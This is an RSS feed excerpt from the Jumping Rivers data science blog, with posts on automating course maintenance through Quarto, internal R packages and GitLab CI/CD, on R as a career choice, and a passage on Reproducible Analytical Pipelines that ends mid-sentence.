<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>The Jumping Rivers Blog</title><link>https://www.jumpingrivers.com/blog/</link><description>Recent content in Blog on Jumping Rivers - Data Science Training and Consultancy</description><generator>Hugo -- gohugo.io</generator><language>en-gb</language><atom:link href="https://www.jumpingrivers.com/blog/index.xml" rel="self" type="application/rss+xml"/><item><title>Using R to Teach R: Lessons for Software Development</title><link>https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/</link><pubDate>Thu, 09 Apr 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As we approach the 10-year anniversary of the founding of Jumping Rivers in 2016, it&amp;rsquo;s a good time to reflect on what we have achieved and share some lessons learned.&lt;/p&gt;
&lt;p&gt;If you have read our blogs previously then you will be aware that Jumping Rivers is a consultancy and training provider in all things data science. But did you know that we offer over 50 different courses spanning R, Python, Git, SQL and more?&lt;/p&gt;
&lt;p&gt;In this blog we will provide a glimpse into our internal process and share how we have streamlined the task of maintaining so many courses. Along the way we will share some good practices applicable to any big coding project, including packaging of source code and automated CI/CD.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2026-teaching-r-packages-reporting-gitlab"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-challenge"&gt;The challenge&lt;/h2&gt;
&lt;p&gt;Let&amp;rsquo;s start by laying out the key challenges which face us.&lt;/p&gt;
&lt;h3 id="1-multilingual-support"&gt;1. Multilingual support&lt;/h3&gt;
&lt;p&gt;Our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course catalogue&lt;/a&gt; consists of over 50 courses. The majority of these are either based on R or Python or both:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;50% R&lt;/li&gt;
&lt;li&gt;30% Python&lt;/li&gt;
&lt;li&gt;5% R and Python&lt;/li&gt;
&lt;li&gt;15% other (Git, SQL, Tableau, Posit and more)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At the very least, any solution that we come up with for standardising our courses must be compatible with both R and Python. Ideally it should also support less frequently taught tools such as SQL and Git.&lt;/p&gt;
&lt;h3 id="2-maintenance"&gt;2. Maintenance&lt;/h3&gt;
&lt;p&gt;The world of R and Python is constantly changing. The languages themselves receive frequent updates, as do publicly available R packages on &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; and Python packages on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As a consequence, code which worked one year ago (or even one day ago) may no longer work with the latest package versions. We need some way to track this and ensure that the code examples covered in our courses remain relevant and error-free.&lt;/p&gt;
&lt;h3 id="3-demand"&gt;3. Demand&lt;/h3&gt;
&lt;p&gt;We deliver over 100 courses per year. For a relatively small team of data scientists, this can be a lot to juggle!&lt;/p&gt;
&lt;p&gt;In an ideal world, the process of building the course materials, setting up the cloud environment for training, and managing all of the administration that goes along with this should be automated. That way, the trainer can focus on providing the highest quality experience for the attendees without having to worry about things going wrong on the day.&lt;/p&gt;
&lt;h2 id="the-solution"&gt;The solution&lt;/h2&gt;
&lt;p&gt;Our team is used to setting up data science workflows for clients, including automated reporting and migration of source code into packages. We have therefore applied these techniques in our internal processes, including training.&lt;/p&gt;
&lt;h3 id="automated-reporting"&gt;Automated reporting&lt;/h3&gt;
&lt;p&gt;You write a document which has to be updated on a regular basis, such as a monthly presentation showing the latest company revenues. Does this scenario sound familiar?&lt;/p&gt;
&lt;p&gt;We &lt;em&gt;could&lt;/em&gt; regenerate the plots and data tables and manually copy and paste these into the report document. Even better, we can take advantage of free-to-use automated reporting frameworks including &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;R Markdown&lt;/a&gt; and &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;R Markdown and Quarto both work as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;We provide a &amp;ldquo;YAML header&amp;rdquo; at the top of the report document with configuration and formatting options:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;---
title: &amp;#34;Introduction to Python&amp;#34;
authors:
- &amp;#34;Myles Mitchell&amp;#34;
date: &amp;#34;2026-04-02&amp;#34;
format: pdf
---
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The report body is formatted as Markdown and supports a mixture of plain text and code:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;## Introduction
At its most basic, Python is essentially a calculator.
We can run basic calculations as follows:
```{python}
2 + 1
```
We can also assign the output of a calculation to a
variable so that it can be reused later:
```{python}
x = 2 + 1
print(x)
```
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Notice that we have included chunks of Python code. By making use of &lt;em&gt;chunk options&lt;/em&gt; we can configure code chunks to be executed when rendering the report. Any outputs from the code (plots, tables, summary statistics) can then be displayed.&lt;/p&gt;
&lt;p&gt;By migrating the code logic into the report itself, we can update our report assets at the click of a button whenever the data changes.&lt;/p&gt;
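&lt;p&gt;The idea can be sketched in a few lines of plain Python. This is a minimal illustration rather than how Quarto or R Markdown work internally: &lt;code&gt;render_report()&lt;/code&gt; is a hypothetical helper and the revenue figures are made up.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;
```python
def render_report(revenues):
    """Build a Markdown revenue report from a dict mapping month to revenue."""
    lines = ["## Monthly revenue", "", "| Month | Revenue |", "|---|---|"]
    for month, amount in revenues.items():
        lines.append(f"| {month} | {amount:,.0f} |")
    total = sum(revenues.values())
    lines.append("")
    lines.append(f"Total revenue: {total:,.0f}")
    return "\n".join(lines)


# Hypothetical figures, for illustration only.
march = {"January": 12000, "February": 15000}
april = {**march, "March": 9000}

# Re-running the same function on new data refreshes every figure.
print(render_report(april))
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because the table and the total are computed from the data, calling the function again with the latest figures refreshes the whole report with no copying and pasting.&lt;/p&gt;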
&lt;p&gt;We have taken inspiration from this approach with our course notes and presentation slides. This forces us to be rigorous with the code examples. Any runtime errors that are produced by faulty or outdated code would be visible in the course notes and by extension to the attendees of our courses.&lt;/p&gt;
&lt;p&gt;Crucially for us, R Markdown and Quarto are both compatible with R and Python. They also support syntax highlighting for languages like Git and SQL, as well as a variety of output formats including HTML and PDF.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/quarto-flow-chart.png" alt="Flow chart illustrating the automated reporting workflow with Quarto. Starting with a text-based .qmd file, this is converted into a Markdown format using Jupyter or knitr. Pandoc is then used to convert this into a variety of output formats including HTML, PDF and Word." /&gt;
&lt;h3 id="internal-r-packages"&gt;Internal R packages&lt;/h3&gt;
&lt;p&gt;So we have settled on a solution for building our course notes. But we have 50 different courses, and setting these up from scratch each time is going to get tedious!&lt;/p&gt;
&lt;p&gt;A good practice in any coding project is to avoid duplication as much as possible. Instead of copying and pasting code, we should really be migrating code into functions which are self contained, reusable and easy to test. This will mean fewer places to debug when things inevitably go wrong.&lt;/p&gt;
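&lt;p&gt;As a small sketch of what this looks like in practice, the YAML header shown earlier could be generated by one function instead of being pasted into every course. The function name &lt;code&gt;course_header()&lt;/code&gt; is hypothetical and is not taken from our internal packages.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;
```python
def course_header(title, authors, date):
    """Return a YAML header for a set of course notes.

    Assumes the values contain no double quotes, so no escaping is done.
    """
    author_lines = "\n".join(f'- "{name}"' for name in authors)
    return "\n".join([
        "---",
        f'title: "{title}"',
        "authors:",
        author_lines,
        f'date: "{date}"',
        "---",
    ])


print(course_header("Introduction to Python", ["Myles Mitchell"], "2026-04-02"))
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A function like this can be tested once and reused everywhere, so a change to the header format only has to be made in one place.&lt;/p&gt;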
&lt;p&gt;Following a similar philosophy for our training infrastructure, we have migrated any reusable assets for our courses&amp;mdash;including logos, template files and styling&amp;mdash;into a collection of internal R packages.&lt;/p&gt;
&lt;p&gt;When building a new course, the developer can now focus on the aspects that are unique to that course:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Code examples&lt;/li&gt;
&lt;li&gt;Notes&lt;/li&gt;
&lt;li&gt;Exercises&lt;/li&gt;
&lt;li&gt;Presentation slides&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Everything else is taken care of automatically:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The appearance of the course notes and presentation slides.&lt;/li&gt;
&lt;li&gt;Build routines including converting the R Markdown / Quarto text files into HTML.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In addition to course templates, we also have internal packages for managing the administrative side of training, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Calculating pricing quotes for clients.&lt;/li&gt;
&lt;li&gt;Generating post-course certificates.&lt;/li&gt;
&lt;li&gt;Spinning up a bespoke &lt;a href="https://posit.co/products/enterprise/workbench/" rel="external"&gt;Posit Workbench&lt;/a&gt; environment for the course.&lt;/li&gt;
&lt;li&gt;Summarising attendee feedback.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And the list goes on!&lt;/p&gt;
&lt;h3 id="gitlab-cicd"&gt;GitLab CI/CD&lt;/h3&gt;
&lt;p&gt;With automated reporting and packaging of source code, we have created standardised routines that can be applied to any of our courses.&lt;/p&gt;
&lt;p&gt;This does not change the fact that we have over 50 courses to maintain. We still need a way of testing our courses and tracking issues. This is where CI/CD (Continuous Integration and Continuous Delivery / Deployment) comes in.&lt;/p&gt;
&lt;p&gt;CI/CD defines a framework for software development, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Automated unit testing.&lt;/li&gt;
&lt;li&gt;Branching of source code and code review.&lt;/li&gt;
&lt;li&gt;Versioning and deployment of software.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you maintain software then you have likely come across version control with Git. Cloud platforms like &lt;a href="https://gitlab.com/" rel="external"&gt;GitLab&lt;/a&gt; and &lt;a href="https://github.com/" rel="external"&gt;GitHub&lt;/a&gt; provide tools for collaborative code development. Not only do they provide a cloud backup of your source code, they also provide the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CI/CD tools for automated testing, build and deployment.&lt;/li&gt;
&lt;li&gt;Branch rules for enforcing good practices like code review and unit testing.&lt;/li&gt;
&lt;li&gt;Versioning and tagging of source code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each of our courses is maintained via its own GitLab repository. The CI/CD pipelines for our courses are defined in a separate repository along with the internal R packages mentioned above.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/standardisation.png" alt="Flow chart illustrating how we have standardised our GitLab training repositories. The templates are defined in a central repository and pushed downstream to our course repositories." /&gt;
&lt;p&gt;When setting up a new course, the course repository will be automatically populated with the template CI/CD rules. All courses are therefore subject to the same stringent checks, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ensuring that the course notes build without errors.&lt;/li&gt;
&lt;li&gt;Enforcing code review of any course updates before these are merged into the main branch.&lt;/li&gt;
&lt;li&gt;Building and storing the &lt;em&gt;artifacts&lt;/em&gt; (the rendered HTML notes and coding scripts) for the latest version of the course.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These checks are triggered by any updates to a course. We also schedule monthly CI/CD pipelines for all courses, with any issues immediately flagged to our trainers.&lt;/p&gt;
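&lt;p&gt;To give a flavour of the first check, here is a toy version in Python. It is only a sketch under simplifying assumptions: it looks for Python chunks in the text of a Quarto document and runs them in order, whereas our real pipelines render the full notes. The helper &lt;code&gt;check_notes()&lt;/code&gt; is hypothetical.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;
```python
import re

FENCE = "`" * 3  # three backticks, built this way to keep the example tidy
CHUNK = re.compile(FENCE + r"\{python\}\n(.*?)" + FENCE, re.DOTALL)


def check_notes(qmd_text):
    """Run each Python chunk in order and return a list of error messages."""
    namespace = {}  # shared, so later chunks can see earlier variables
    errors = []
    for number, code in enumerate(CHUNK.findall(qmd_text), start=1):
        try:
            exec(code, namespace)
        except Exception as exc:
            errors.append(f"chunk {number}: {type(exc).__name__}: {exc}")
    return errors


# Hypothetical course notes: the second chunk uses a name that is never defined.
notes = "\n".join([
    "## Introduction",
    FENCE + "{python}",
    "x = 2 + 1",
    FENCE,
    FENCE + "{python}",
    "print(x + undefined_name)",
    FENCE,
])

print(check_notes(notes))
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A CI/CD job built around a check like this could fail whenever the returned list is not empty, which is what turns a broken code example into a flagged issue rather than a surprise on the day.&lt;/p&gt;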
&lt;p&gt;We have also taken advantage of GitLab&amp;rsquo;s folder-like structure for organising code repositories. Within the Jumping Rivers group on GitLab, we have a subgroup called &amp;ldquo;training&amp;rdquo;. All of our course-related repositories are located &amp;ldquo;downstream&amp;rdquo; from this subgroup. This means that any settings or environment variables defined at the &amp;ldquo;training&amp;rdquo; level are automatically applied to all of our courses.&lt;/p&gt;
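&lt;p&gt;This inheritance can be pictured as a layered lookup. The Python sketch below is a model of the behaviour, not GitLab code: the variable names and values are made up, and it assumes that a value set on an individual course takes precedence over the one inherited from the &amp;ldquo;training&amp;rdquo; level.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;
```python
from collections import ChainMap

# Hypothetical variable names and values, for illustration only.
training_level = {"R_VERSION": "4.5", "NOTES_FORMAT": "html"}
course_level = {"NOTES_FORMAT": "pdf"}

# Lookups try the course first, then fall back to the "training" level.
effective = ChainMap(course_level, training_level)

print(effective["R_VERSION"])     # inherited from the "training" level
print(effective["NOTES_FORMAT"])  # overridden by the course
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Defining a value once at the top level means a new course picks it up without any extra configuration.&lt;/p&gt;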
&lt;h2 id="in-summary"&gt;In summary&lt;/h2&gt;
&lt;p&gt;The take-home lessons from this blog are applicable to any big coding project:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Avoid duplication: migrate any reusable logic or assets into standalone packages.&lt;/li&gt;
&lt;li&gt;Utilise CI/CD workflows using GitLab, GitHub or similar.&lt;/li&gt;
&lt;li&gt;Focus on what matters by automating as much of the process as possible.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our training infrastructure has taken 10 years to build and is still constantly evolving; we have not even covered the full process in this blog! For a deeper dive, check out this &lt;a href="https://youtu.be/MD0F3ChgqBE?si=EFSHE6MOqgU5I9UM" rel="external"&gt;talk&lt;/a&gt; by Myles at SatRdays London 2024.&lt;/p&gt;
&lt;p&gt;For more on automated reporting, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;Quarto for the Python user&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/" rel="external"&gt;Parameterised presentations with Quarto&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more on packaging of source code, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/personal-r-package/" rel="external"&gt;Writing a personal R package&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Three-part series: &lt;a href="https://www.jumpingrivers.com/blog/?search=creating+a+python+package" rel="external"&gt;Creating a Python package&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Four-part series: &lt;a href="https://www.jumpingrivers.com/blog/?search=r+package+quality" rel="external"&gt;R package quality&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why Learning R is a Good Career Move in 2026</title><link>https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/</link><pubDate>Thu, 26 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Over the course of my career as a Data Scientist, I&amp;rsquo;ve worked on projects ranging from simple code reviews to large application builds. For the most part, I have used R to do this.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re getting into coding or data science, one question you&amp;rsquo;re probably asking yourself is &lt;em&gt;&amp;ldquo;Which language should I learn?&amp;rdquo;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This blog aims to show you why R might be a good decision.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;hr&gt;
&lt;h2 id="r-was-built-for-data-not-just-programming"&gt;R was built for data (not just programming)&lt;/h2&gt;
&lt;p&gt;Unlike general purpose languages (such as Python), R was designed specifically for statistics and data analysis.&lt;/p&gt;
&lt;p&gt;That means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Built in statistical tools&lt;/li&gt;
&lt;li&gt;Powerful visualisation capabilities&lt;/li&gt;
&lt;li&gt;Research level methods available immediately&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With packages like the &lt;strong&gt;tidyverse&lt;/strong&gt;, you can clean, analyse, and visualise data with surprisingly little code.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="high-demand-in-analytics-research-and-healthcare"&gt;High demand in analytics, research, and healthcare&lt;/h2&gt;
&lt;p&gt;R is especially popular in many sectors such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Healthcare &amp;amp; biostats&lt;/li&gt;
&lt;li&gt;Academic research&lt;/li&gt;
&lt;li&gt;Government departments&lt;/li&gt;
&lt;li&gt;Finance &amp;amp; risk modeling&lt;/li&gt;
&lt;li&gt;Pharmaceutical companies&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here are some examples of R in production use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;a href="https://github.com/bbc/bbplot" rel="external"&gt;{bbplot} R package&lt;/a&gt;. Yes, the BBC use R to create graphics for their website!&lt;/li&gt;
&lt;li&gt;Health and wellbeing profiling &lt;a href="https://shiny.posit.co/r/gallery/government-public-sector/scotpho-profiles/" rel="external"&gt;app&lt;/a&gt; for the NHS&lt;/li&gt;
&lt;li&gt;During the Covid-19 pandemic, the Financial Times had a &lt;a href="https://www.ft.com/content/a2901ce8-5eb7-4633-b89c-cbdf5b386938" rel="external"&gt;stats tracker&lt;/a&gt; in which the graphs were built with R.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Knowing some R will give you a competitive edge if you&amp;rsquo;re looking at working within these sectors.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="open-source-with-the-backing-of-posit"&gt;Open source with the backing of Posit&lt;/h2&gt;
&lt;p&gt;R is open source. This means that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It&amp;rsquo;s free, and always will be!&lt;/li&gt;
&lt;li&gt;Anyone can view the source code that makes up R.&lt;/li&gt;
&lt;li&gt;Many R packages (a package is a folder containing code) are developed in the open on &lt;a href="https://github.com/" rel="external"&gt;GitHub.com&lt;/a&gt;, for everyone to see.&lt;/li&gt;
&lt;li&gt;It has a large community of contributors. There are great places to get help, such as &lt;a href="https://stackoverflow.com/questions/tagged/r?tab=Votes" rel="external"&gt;Stack Overflow&lt;/a&gt;, &lt;a href="https://forum.posit.co/" rel="external"&gt;Posit Community&lt;/a&gt; and the &lt;a href="https://rweekly.org/" rel="external"&gt;R Weekly newsletter&lt;/a&gt;, and tonnes more.&lt;/li&gt;
&lt;li&gt;Thousands of add-on packages provide functionality that goes beyond paid software such as SPSS, SAS or Excel.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;, who maintain the free-to-use RStudio and Positron IDEs (integrated development environments), have many full-time staff working solely on maintaining and creating new functionality within R. This means we get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Defined accountability&lt;/li&gt;
&lt;li&gt;Predictable release cycles&lt;/li&gt;
&lt;li&gt;Faster bug fixes&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="incredible-data-visualisation-possibilities"&gt;Incredible data visualisation possibilities&lt;/h2&gt;
&lt;p&gt;Being able to communicate your findings with stakeholders is very important in data science, and one of R’s biggest strengths is visualisation and reporting.&lt;/p&gt;
&lt;p&gt;With the &lt;strong&gt;{ggplot2}&lt;/strong&gt; package, you can create publication ready charts with very little code. The &lt;a href="https://r-graph-gallery.com/best-r-chart-examples.html" rel="external"&gt;R Graph Gallery&lt;/a&gt; has some amazing examples of what is possible with {ggplot2}.&lt;/p&gt;
&lt;p&gt;With the &lt;strong&gt;{quarto}&lt;/strong&gt; and &lt;strong&gt;{shiny}&lt;/strong&gt; packages, you are able to build reproducible reports and interactive dashboards. All this without needing to know any HTML, CSS or JavaScript.&lt;/p&gt;
&lt;h2 id="beginner-friendly-learning-curve"&gt;Beginner friendly learning curve&lt;/h2&gt;
&lt;p&gt;This is very much my own opinion. Compared to other languages, I think R is
fairly intuitive and feels rewarding much earlier on in the journey. It also has, in my opinion, the most beginner-friendly program to code in: RStudio.&lt;/p&gt;
&lt;p&gt;Most people attend only two days&amp;rsquo; worth of training with Jumping Rivers and say they feel ready to start tackling their own data problems.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="so-is-r-worth-learning-in-2026"&gt;So… is R worth learning in 2026?&lt;/h2&gt;
&lt;p&gt;I think so. If you want pure software engineering or large-scale production systems, you may need Python. But for becoming a &lt;strong&gt;strong data thinker&lt;/strong&gt;, and giving you an edge in your analysis, R is one of the best starting points.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reproducible Analytical Pipelines</title><link>https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/</link><pubDate>Thu, 19 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Here&amp;rsquo;s the new data. Could you summarise it
like Alice did last year, and send me a report?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The civil service and public bodies in the UK publish lots of &lt;a href="https://www.data.gov.uk/" rel="external"&gt;datasets&lt;/a&gt;.
These datasets can be really helpful when experimenting with data visualisation and presentation
tools.
As data consumers, what we rarely see is the amount of work that goes into preparing those datasets,
or how they are used to make decisions about, or understand trends within, the country.
That work has to be coordinated across multiple people, each with different skills.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2026-reproducible-analytical-pipelines"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Much like teams do, software and data evolve over time.
The raw data that feeds into the above datasets, and any products that are built upon them (reports,
applications and so on), may only be collected and processed every few years - and a lot can change
in a few years.
So, teams within those departments need a way to reliably generate those datasets and data products
from newly-collected raw data that is robust (or at least flexible) enough to accommodate changes
in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;data quality,&lt;/li&gt;
&lt;li&gt;the structure/schema of the raw data,&lt;/li&gt;
&lt;li&gt;personnel within the team and departmental restructuring,&lt;/li&gt;
&lt;li&gt;software tooling,&lt;/li&gt;
&lt;li&gt;output data format or usage.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It is becoming more common for this kind of data processing to be handled by a
&lt;em&gt;Reproducible Analytical Pipeline&lt;/em&gt; (RAP).
A RAP is a largely automated process written in code.
One aim of using RAPs here is to reduce the amount of manual and ad-hoc input into the data
processing, so that when given the same input data you would generate the same downstream products
and so that the process should work successfully and predictably when given new data.
By placing the processing decisions in code, RAPs make data processing more easily auditable and
more transparent.&lt;/p&gt;
&lt;p&gt;The
&lt;a href="https://analysisfunction.civilservice.gov.uk/support/reproducible-analytical-pipelines/" rel="external"&gt;UK Civil Service&lt;/a&gt;
and &lt;a href="https://nhsdigital.github.io/rap-community-of-practice/" rel="external"&gt;the NHS&lt;/a&gt; have guidelines on their aims
for RAPs and how to create these pipelines.&lt;/p&gt;
&lt;p&gt;Now, you might not be working for one of those institutions, and the data processing and analysis
that you perform might not be public facing or subject to a national audit.
But, if you&amp;rsquo;re doing data science or data processing as part of your job, the ideas surrounding RAPs
may help you work more efficiently.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s start with the basics:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;where does your data come from?&lt;/li&gt;
&lt;li&gt;where does it go to?&lt;/li&gt;
&lt;li&gt;what is your main tool when working with it?&lt;/li&gt;
&lt;li&gt;and who else either depends upon, or is also responsible for, your work?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The
&lt;a href="https://analysisfunction.civilservice.gov.uk/support/reproducible-analytical-pipelines/" rel="external"&gt;RAP guidelines for the UK Civil Service&lt;/a&gt;
promote the use of open-source tools, version control, and automation.
Which tools should you choose, what should you automate, and who needs to know about or approve what
you are doing?&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve inherited an Excel workbook with last year&amp;rsquo;s data embedded inside it and you need to
process this year&amp;rsquo;s data, you may not know enough about the processes that occurred before last
year&amp;rsquo;s data was copied into the spreadsheet or any manual tweaks that happened after it was imported
(how missing values were handled, for example).
You could automate the early data-ingestion stages.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve inherited some SQL scripts that make database queries and you have to
copy-paste the resulting values into a report, you could automate the report-generation step.&lt;/p&gt;
&lt;p&gt;If you have a collection of analysis steps or scripts that have to be called in a particular order,
or where you have to manually edit the scripts (fixing the filepaths, for example) for them to work
with a new raw-data release, you could think about how to orchestrate running those scripts or how
to configure the project so that it requires less manual intervention to run next time.
Editing code and calling commands in a programming environment are manual processes, too.&lt;/p&gt;
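&lt;p&gt;A minimal Python sketch of that kind of orchestration follows. The step names, the &lt;code&gt;missing_marker&lt;/code&gt; setting and the data are all hypothetical, and the raw data is held in memory to keep the example self-contained; a real project would read files and might use a dedicated pipeline tool instead.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;
```python
import csv
import io


def ingest(raw_csv):
    """Parse raw CSV text into a list of row dictionaries."""
    return list(csv.DictReader(io.StringIO(raw_csv)))


def clean(rows, missing_marker):
    """Drop rows whose value is missing and convert the rest to numbers."""
    return [
        {"region": row["region"], "value": float(row["value"])}
        for row in rows
        if row["value"] != missing_marker
    ]


def summarise(rows):
    """Total the values per region."""
    totals = {}
    for row in rows:
        totals[row["region"]] = totals.get(row["region"], 0.0) + row["value"]
    return totals


def run_pipeline(raw_csv, config):
    """Run every step in a fixed order, driven by config rather than by edits."""
    rows = ingest(raw_csv)
    rows = clean(rows, config["missing_marker"])
    return summarise(rows)


# Hypothetical data and settings, for illustration only.
config = {"missing_marker": "NA"}
raw = "region,value\nNorth,10\nSouth,NA\nNorth,5\n"
print(run_pipeline(raw, config))
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The order of the steps and the handling of missing values are now written down in code, so a new data release means changing the inputs, not the scripts.&lt;/p&gt;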
&lt;p&gt;You may not be able to automate everything at once.
So try to make strategic wins on those areas of your data workflow that are the least clear, or that
involve the most manual input.&lt;/p&gt;
&lt;p&gt;The push towards automation requires programming skills, and a choice over a programming language.
In data science this typically means SQL plus either R or Python.
Which you choose for a project depends on the skills across your team and the infrastructure that
is available to you.
Don&amp;rsquo;t use your favourite language, or a language you want to experiment with, if no-one else on the
